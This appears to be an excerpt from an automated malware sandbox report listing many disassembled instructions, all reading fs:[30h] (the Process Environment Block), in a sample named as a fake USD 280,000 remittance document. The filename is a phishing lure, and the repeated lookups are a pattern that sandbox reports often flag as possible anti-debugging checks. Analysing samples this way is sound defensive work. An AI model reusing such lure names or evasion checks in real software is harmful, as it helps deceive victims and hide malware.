            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181E75D mov eax, dword ptr fs:[00000030h]9_2_0181E75D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C2674 mov eax, dword ptr fs:[00000030h]9_2_017C2674
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA660 mov eax, dword ptr fs:[00000030h]9_2_017CA660
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA660 mov eax, dword ptr fs:[00000030h]9_2_017CA660
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AC640 mov eax, dword ptr fs:[00000030h]9_2_017AC640
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179262C mov eax, dword ptr fs:[00000030h]9_2_0179262C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C6620 mov eax, dword ptr fs:[00000030h]9_2_017C6620
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C8620 mov eax, dword ptr fs:[00000030h]9_2_017C8620
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE627 mov eax, dword ptr fs:[00000030h]9_2_017AE627
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2619 mov eax, dword ptr fs:[00000030h]9_2_017D2619
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018106F1 mov eax, dword ptr fs:[00000030h]9_2_018106F1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018106F1 mov eax, dword ptr fs:[00000030h]9_2_018106F1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A260B mov eax, dword ptr fs:[00000030h]9_2_017A260B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A260B mov eax, dword ptr fs:[00000030h]9_2_017A260B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A260B mov eax, dword ptr fs:[00000030h]9_2_017A260B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A260B mov eax, dword ptr fs:[00000030h]9_2_017A260B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A260B mov eax, dword ptr fs:[00000030h]9_2_017A260B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A260B mov eax, dword ptr fs:[00000030h]9_2_017A260B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A260B mov eax, dword ptr fs:[00000030h]9_2_017A260B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E6F2 mov eax, dword ptr fs:[00000030h]9_2_0180E6F2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E6F2 mov eax, dword ptr fs:[00000030h]9_2_0180E6F2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E6F2 mov eax, dword ptr fs:[00000030h]9_2_0180E6F2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E6F2 mov eax, dword ptr fs:[00000030h]9_2_0180E6F2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E609 mov eax, dword ptr fs:[00000030h]9_2_0180E609
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA6C7 mov ebx, dword ptr fs:[00000030h]9_2_017CA6C7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA6C7 mov eax, dword ptr fs:[00000030h]9_2_017CA6C7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C66B0 mov eax, dword ptr fs:[00000030h]9_2_017C66B0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CC6A6 mov eax, dword ptr fs:[00000030h]9_2_017CC6A6
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01794690 mov eax, dword ptr fs:[00000030h]9_2_01794690
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01794690 mov eax, dword ptr fs:[00000030h]9_2_01794690
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185866E mov eax, dword ptr fs:[00000030h]9_2_0185866E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185866E mov eax, dword ptr fs:[00000030h]9_2_0185866E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D096E mov eax, dword ptr fs:[00000030h]9_2_017D096E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D096E mov edx, dword ptr fs:[00000030h]9_2_017D096E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D096E mov eax, dword ptr fs:[00000030h]9_2_017D096E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B6962 mov eax, dword ptr fs:[00000030h]9_2_017B6962
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B6962 mov eax, dword ptr fs:[00000030h]9_2_017B6962
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B6962 mov eax, dword ptr fs:[00000030h]9_2_017B6962
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018189B3 mov esi, dword ptr fs:[00000030h]9_2_018189B3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018189B3 mov eax, dword ptr fs:[00000030h]9_2_018189B3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018189B3 mov eax, dword ptr fs:[00000030h]9_2_018189B3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018269C0 mov eax, dword ptr fs:[00000030h]9_2_018269C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185A9D3 mov eax, dword ptr fs:[00000030h]9_2_0185A9D3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01788918 mov eax, dword ptr fs:[00000030h]9_2_01788918
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01788918 mov eax, dword ptr fs:[00000030h]9_2_01788918
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181E9E0 mov eax, dword ptr fs:[00000030h]9_2_0181E9E0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C29F9 mov eax, dword ptr fs:[00000030h]9_2_017C29F9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C29F9 mov eax, dword ptr fs:[00000030h]9_2_017C29F9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E908 mov eax, dword ptr fs:[00000030h]9_2_0180E908
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E908 mov eax, dword ptr fs:[00000030h]9_2_0180E908
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181C912 mov eax, dword ptr fs:[00000030h]9_2_0181C912
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A9D0 mov eax, dword ptr fs:[00000030h]9_2_0179A9D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A9D0 mov eax, dword ptr fs:[00000030h]9_2_0179A9D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A9D0 mov eax, dword ptr fs:[00000030h]9_2_0179A9D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A9D0 mov eax, dword ptr fs:[00000030h]9_2_0179A9D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A9D0 mov eax, dword ptr fs:[00000030h]9_2_0179A9D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A9D0 mov eax, dword ptr fs:[00000030h]9_2_0179A9D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0182892B mov eax, dword ptr fs:[00000030h]9_2_0182892B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181892A mov eax, dword ptr fs:[00000030h]9_2_0181892A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C49D0 mov eax, dword ptr fs:[00000030h]9_2_017C49D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864940 mov eax, dword ptr fs:[00000030h]9_2_01864940
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01810946 mov eax, dword ptr fs:[00000030h]9_2_01810946
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017909AD mov eax, dword ptr fs:[00000030h]9_2_017909AD
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017909AD mov eax, dword ptr fs:[00000030h]9_2_017909AD
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A0 mov eax, dword ptr fs:[00000030h]9_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01834978 mov eax, dword ptr fs:[00000030h]9_2_01834978
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01834978 mov eax, dword ptr fs:[00000030h]9_2_01834978
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181C97C mov eax, dword ptr fs:[00000030h]9_2_0181C97C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181C89D mov eax, dword ptr fs:[00000030h]9_2_0181C89D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01794859 mov eax, dword ptr fs:[00000030h]9_2_01794859
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01794859 mov eax, dword ptr fs:[00000030h]9_2_01794859
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C0854 mov eax, dword ptr fs:[00000030h]9_2_017C0854
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A2840 mov ecx, dword ptr fs:[00000030h]9_2_017A2840
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018608C0 mov eax, dword ptr fs:[00000030h]9_2_018608C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA830 mov eax, dword ptr fs:[00000030h]9_2_017CA830
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B2835 mov eax, dword ptr fs:[00000030h]9_2_017B2835
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B2835 mov eax, dword ptr fs:[00000030h]9_2_017B2835
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B2835 mov eax, dword ptr fs:[00000030h]9_2_017B2835
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B2835 mov ecx, dword ptr fs:[00000030h]9_2_017B2835
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B2835 mov eax, dword ptr fs:[00000030h]9_2_017B2835
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B2835 mov eax, dword ptr fs:[00000030h]9_2_017B2835
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185A8E4 mov eax, dword ptr fs:[00000030h]9_2_0185A8E4
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CC8F9 mov eax, dword ptr fs:[00000030h]9_2_017CC8F9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CC8F9 mov eax, dword ptr fs:[00000030h]9_2_017CC8F9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181C810 mov eax, dword ptr fs:[00000030h]9_2_0181C810
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183483A mov eax, dword ptr fs:[00000030h]9_2_0183483A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183483A mov eax, dword ptr fs:[00000030h]9_2_0183483A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE8C0 mov eax, dword ptr fs:[00000030h]9_2_017BE8C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01826870 mov eax, dword ptr fs:[00000030h]9_2_01826870
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01826870 mov eax, dword ptr fs:[00000030h]9_2_01826870
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181E872 mov eax, dword ptr fs:[00000030h]9_2_0181E872
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181E872 mov eax, dword ptr fs:[00000030h]9_2_0181E872
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01790887 mov eax, dword ptr fs:[00000030h]9_2_01790887
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178CB7E mov eax, dword ptr fs:[00000030h]9_2_0178CB7E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01788B50 mov eax, dword ptr fs:[00000030h]9_2_01788B50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01844BB0 mov eax, dword ptr fs:[00000030h]9_2_01844BB0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01844BB0 mov eax, dword ptr fs:[00000030h]9_2_01844BB0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183EBD0 mov eax, dword ptr fs:[00000030h]9_2_0183EBD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BEB20 mov eax, dword ptr fs:[00000030h]9_2_017BEB20
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BEB20 mov eax, dword ptr fs:[00000030h]9_2_017BEB20
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181CBF0 mov eax, dword ptr fs:[00000030h]9_2_0181CBF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864B00 mov eax, dword ptr fs:[00000030h]9_2_01864B00
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BEBFC mov eax, dword ptr fs:[00000030h]9_2_017BEBFC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01798BF0 mov eax, dword ptr fs:[00000030h]9_2_01798BF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01798BF0 mov eax, dword ptr fs:[00000030h]9_2_01798BF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01798BF0 mov eax, dword ptr fs:[00000030h]9_2_01798BF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180EB1D mov eax, dword ptr fs:[00000030h]9_2_0180EB1D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180EB1D mov eax, dword ptr fs:[00000030h]9_2_0180EB1D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180EB1D mov eax, dword ptr fs:[00000030h]9_2_0180EB1D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180EB1D mov eax, dword ptr fs:[00000030h]9_2_0180EB1D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180EB1D mov eax, dword ptr fs:[00000030h]9_2_0180EB1D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180EB1D mov eax, dword ptr fs:[00000030h]9_2_0180EB1D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180EB1D mov eax, dword ptr fs:[00000030h]9_2_0180EB1D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180EB1D mov eax, dword ptr fs:[00000030h]9_2_0180EB1D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180EB1D mov eax, dword ptr fs:[00000030h]9_2_0180EB1D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01858B28 mov eax, dword ptr fs:[00000030h]9_2_01858B28
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01858B28 mov eax, dword ptr fs:[00000030h]9_2_01858B28
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B0BCB mov eax, dword ptr fs:[00000030h]9_2_017B0BCB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B0BCB mov eax, dword ptr fs:[00000030h]9_2_017B0BCB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B0BCB mov eax, dword ptr fs:[00000030h]9_2_017B0BCB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01790BCD mov eax, dword ptr fs:[00000030h]9_2_01790BCD
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01790BCD mov eax, dword ptr fs:[00000030h]9_2_01790BCD
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01790BCD mov eax, dword ptr fs:[00000030h]9_2_01790BCD
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01838B42 mov eax, dword ptr fs:[00000030h]9_2_01838B42
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01826B40 mov eax, dword ptr fs:[00000030h]9_2_01826B40
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01826B40 mov eax, dword ptr fs:[00000030h]9_2_01826B40
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0BBE mov eax, dword ptr fs:[00000030h]9_2_017A0BBE
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0BBE mov eax, dword ptr fs:[00000030h]9_2_017A0BBE
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185AB40 mov eax, dword ptr fs:[00000030h]9_2_0185AB40
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01844B4B mov eax, dword ptr fs:[00000030h]9_2_01844B4B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01844B4B mov eax, dword ptr fs:[00000030h]9_2_01844B4B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01862B57 mov eax, dword ptr fs:[00000030h]9_2_01862B57
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01862B57 mov eax, dword ptr fs:[00000030h]9_2_01862B57
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01862B57 mov eax, dword ptr fs:[00000030h]9_2_01862B57
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01862B57 mov eax, dword ptr fs:[00000030h]9_2_01862B57
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183EB50 mov eax, dword ptr fs:[00000030h]9_2_0183EB50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864A80 mov eax, dword ptr fs:[00000030h]9_2_01864A80
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CCA6F mov eax, dword ptr fs:[00000030h]9_2_017CCA6F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CCA6F mov eax, dword ptr fs:[00000030h]9_2_017CCA6F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CCA6F mov eax, dword ptr fs:[00000030h]9_2_017CCA6F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0A5B mov eax, dword ptr fs:[00000030h]9_2_017A0A5B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0A5B mov eax, dword ptr fs:[00000030h]9_2_017A0A5B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CCA38 mov eax, dword ptr fs:[00000030h]9_2_017CCA38
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B4A35 mov eax, dword ptr fs:[00000030h]9_2_017B4A35
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B4A35 mov eax, dword ptr fs:[00000030h]9_2_017B4A35
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BEA2E mov eax, dword ptr fs:[00000030h]9_2_017BEA2E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CCA24 mov eax, dword ptr fs:[00000030h]9_2_017CCA24
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181CA11 mov eax, dword ptr fs:[00000030h]9_2_0181CA11
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CAAEE mov eax, dword ptr fs:[00000030h]9_2_017CAAEE
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CAAEE mov eax, dword ptr fs:[00000030h]9_2_017CAAEE
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01790AD0 mov eax, dword ptr fs:[00000030h]9_2_01790AD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C4AD0 mov eax, dword ptr fs:[00000030h]9_2_017C4AD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C4AD0 mov eax, dword ptr fs:[00000030h]9_2_017C4AD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E6ACC mov eax, dword ptr fs:[00000030h]9_2_017E6ACC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E6ACC mov eax, dword ptr fs:[00000030h]9_2_017E6ACC
